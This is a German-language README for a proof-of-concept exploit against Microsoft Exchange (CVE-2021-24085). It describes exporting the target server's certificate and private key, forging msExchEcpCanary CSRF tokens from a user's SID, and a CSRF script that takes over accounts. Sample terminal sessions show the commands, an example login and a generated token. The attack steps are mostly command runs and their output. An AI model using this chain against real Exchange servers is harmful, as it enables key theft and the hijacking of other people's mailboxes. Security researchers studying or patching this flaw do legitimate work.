
Proof-of-Concept-Exploit für CVE-2021-24085: CSRF-basierte Privilegienausweitung in Microsoft Exchange Server durch Fälschung des msExchEcpCanary-Tokens, was die Übernahme von Konten ermöglicht.
Dies ist ein Proof of Concept für CVE-2021-24085.
poc.py lädt die Zertifikatsdatei des Ziels mit privatem Schlüssel herunterYellowCanary generiert das msExchEcpCanary-CSRF-Token für einen bestimmten Benutzer basierend auf der SIDpoc.js ist der CSRF-Exploit, um eine Kontokapern auszulösenIch habe die Datei malicifest.xml nicht bereitgestellt, aber Sie finden Informationen zur Erstellung einer bösartigen Manifestdatei in den verfügbaren Ressourcen im folgenden Referenzabschnitt.
Access the certificate with private key inside:
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###
researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax
Jetzt können Sie CSRF-Tokens mit YellowCanary generieren, indem Sie die SID eines Zielbenutzers verwenden:
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax
#====================================================
# YellowCanary - generate msExchEcpCanary csrf tokens
#====================================================
security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.